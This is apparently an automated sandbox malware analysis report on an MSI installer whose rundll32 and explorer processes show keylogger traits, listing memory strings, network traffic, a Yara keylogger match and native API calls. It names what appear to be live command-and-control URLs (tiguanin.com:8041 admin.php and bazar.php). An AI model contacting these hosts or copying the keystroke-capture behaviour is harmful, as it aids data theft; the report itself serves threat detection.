Source: rundll32.exe, 00000006.00000003.1457055405.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1532906794.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1463527230.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1522469474.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543477822.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513792190.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/:
Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/C%m
Source: rundll32.exe, 00000006.00000003.1532906794.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1522469474.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543477822.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/G%i
Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.php/4Q
Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.php;
Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpL
Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpT
Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpV4h
Source: rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpl4
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/admin.phpo
Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/azar.php
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD284B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpK
Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpM
Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpT
Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpV
Source: rundll32.exe, 00000006.00000002.3806960188.0000016AD28D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpiP5
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.phpj
Source: rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/bazar.php~
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com:8041/j
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.1792832688.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3074047960.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000000.1791266554.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 62326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62282
Source: unknown	Network traffic detected: HTTP traffic on port 62290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62284
Source: unknown	Network traffic detected: HTTP traffic on port 62412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62315
Source: unknown	Network traffic detected: HTTP traffic on port 62387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62318
Source: unknown	Network traffic detected: HTTP traffic on port 62278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62395
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62276
Source: unknown	Network traffic detected: HTTP traffic on port 62358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62399
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62291
Source: unknown	Network traffic detected: HTTP traffic on port 62272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62293
Source: unknown	Network traffic detected: HTTP traffic on port 62300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62381 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62326
Source: unknown	Network traffic detected: HTTP traffic on port 62315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62329
Source: unknown	Network traffic detected: HTTP traffic on port 62258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62286
Source: unknown	Network traffic detected: HTTP traffic on port 62332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62320
Source: unknown	Network traffic detected: HTTP traffic on port 62395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62323
Source: unknown	Network traffic detected: HTTP traffic on port 62353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62408 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62338
Source: unknown	Network traffic detected: HTTP traffic on port 62340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62339
Source: unknown	Network traffic detected: HTTP traffic on port 62257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62297
Source: unknown	Network traffic detected: HTTP traffic on port 62356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62334
Source: unknown	Network traffic detected: HTTP traffic on port 62373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62379 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62341
Source: unknown	Network traffic detected: HTTP traffic on port 62263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62344
Source: unknown	Network traffic detected: HTTP traffic on port 62334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62347
Source: unknown	Network traffic detected: HTTP traffic on port 62351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62359
Source: unknown	Network traffic detected: HTTP traffic on port 62339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62351
Source: unknown	Network traffic detected: HTTP traffic on port 62394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62354
Source: unknown	Network traffic detected: HTTP traffic on port 62354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62357
Source: unknown	Network traffic detected: HTTP traffic on port 62371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62358
Source: unknown	Network traffic detected: HTTP traffic on port 62304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62372
Source: unknown	Network traffic detected: HTTP traffic on port 62279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62404
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62407
Source: unknown	Network traffic detected: HTTP traffic on port 62282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62408
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62409
Source: unknown	Network traffic detected: HTTP traffic on port 62420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62366
Source: unknown	Network traffic detected: HTTP traffic on port 62391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62401
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62402
Source: unknown	Network traffic detected: HTTP traffic on port 62267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62381
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62383
Source: unknown	Network traffic detected: HTTP traffic on port 62273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62414
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62416
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62417
Source: unknown	Network traffic detected: HTTP traffic on port 62389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62373
Source: unknown	Network traffic detected: HTTP traffic on port 62404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62410
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62379
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62412
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62259
Source: unknown	Network traffic detected: HTTP traffic on port 62318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62409 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62391
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62394
Source: unknown	Network traffic detected: HTTP traffic on port 62383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62304
Source: unknown	Network traffic detected: HTTP traffic on port 62338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62306
Source: unknown	Network traffic detected: HTTP traffic on port 62313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62308
Source: unknown	Network traffic detected: HTTP traffic on port 62401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62387
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62420
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62300
Source: unknown	Network traffic detected: HTTP traffic on port 62372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62389

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2

Creates a DirectInput object (often for capturing keystrokes)

Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_169633ac-3

Installs a raw input device (often for capturing keystrokes)

Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_b5e792e3-e

Yara detected Keylogger Generic

Source: Yara match	File source: 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000016AD27DD98E NtAllocateVirtualMemory,	6_3_0000016AD27DD98E
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000016AD27DD9FE NtOpenFile,	6_3_0000016AD27DD9FE
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000016AD27DDA6E NtProtectVirtualMemory,	6_3_0000016AD27DDA6E
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000016AD27DDACE NtReadFile,	6_3_0000016AD27DDACE
Source: C:\Windows\explorer.exe	Code function: 9_2_00F282B4 NtFreeVirtualMemory,	9_2_00F282B4
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2B388 NtAllocateVirtualMemory,	9_2_00F2B388
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2C704 NtDelayExecution,	9_2_00F2C704
Source: C:\Windows\explorer.exe	Code function: 9_2_00F280B8 RtlInitUnicodeString,NtCreateFile,	9_2_00F280B8
Source: C:\Windows\explorer.exe	Code function: 9_2_00F28240 NtClose,	9_2_00F28240
Source: C:\Windows\explorer.exe	Code function: 9_2_00F281C8 NtWriteFile,	9_2_00F281C8
Source: C:\Windows\explorer.exe	Code function: 9_2_00F301A0 NtFreeVirtualMemory,	9_2_00F301A0
Source: C:\Windows\explorer.exe	Code function: 9_2_00F30130 NtAllocateVirtualMemory,	9_2_00F30130

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6a9d65.msi	Jump to behavior
